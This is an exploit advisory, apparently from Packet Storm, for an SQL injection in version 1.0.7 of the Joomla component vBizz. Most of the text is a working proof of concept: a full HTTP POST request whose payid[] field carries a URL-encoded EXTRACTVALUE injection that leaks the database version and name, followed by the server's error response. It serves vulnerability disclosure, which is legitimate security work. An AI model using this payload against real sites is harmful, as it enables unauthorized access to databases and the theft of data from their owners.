Joomla! vBizz 1.0.7 SQL Injection

Joomla! vBizz component version 1.0.7 suffers from a remote SQL injection vulnerability.

MD5 | 78bba9c7c3f1203134ac5d9016aaca19

Download

# Exploit Title: Joomla! Component vBizz 1.0.7 - SQL Injection
# Dork: N/A
# Date: 2019-01-23
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://wdmtech.com/
# Software Link: https://extensions.joomla.org/extensions/extension/marketing/crm/vbizz/
# Version: 1.0.7
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC: 
# 1)
# http://localhost/[PATH]/index.php
# 

POST /[PATH]/index.php? HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 726
Cookie: 84c9f7083d1056c3a8f06ae659d3db0a=9t045qt6rjftqm53itf5uju310; joomla_user_state=logged_in
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
profile_pic=&name=test&username=test&password=&user_role=11&[email protected]&empid=1&department=5&designation=6&phone=&gender=1&blood_group=A%2B&dob=-1-11-30&present_address=&permanent_address=&joining_date=-1-11-30&work_type=permanent&payment_type=bank&pan=&pf_ac=0&bank_ac=0&bank_name=&bank_branch=&ifsc=&leaving_date=-1-11-30&amount[]=111.00&payid[]=7&amount[]=0.00&payid[]=8&amount[]=0.00&payid[]=9%20%20%41%4e%44%20%45%58%54%52%41%43%54%56%41%4c%55%45%28%32%32%2c%43%4f%4e%43%41%54%28%30%78%35%63%2c%76%65%72%73%69%6f%6e%28%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%31%3d%31%2c%31%29%29%29%2c%64%61%74%61%62%61%73%65%28%29%29%29%2d%2d%20%58&lastIncrement=7&option=com_vbizz&id=60&userid=60&task=apply&view=employee: undefined
HTTP/1.1 500 Internal Server Error
X-Powered-By: PHP/5.6.36
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Server: - Web acceleration by http://target/
X-Cacheable: NO: beresp.status
X-Cacheable-status: 500
Content-Length: 4278
Accept-Ranges: bytes
Date: Tue, 22 Jan 2019 21:10:53 GMT
X-Varnish: 561075451
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

Source: packetstormsecurity.com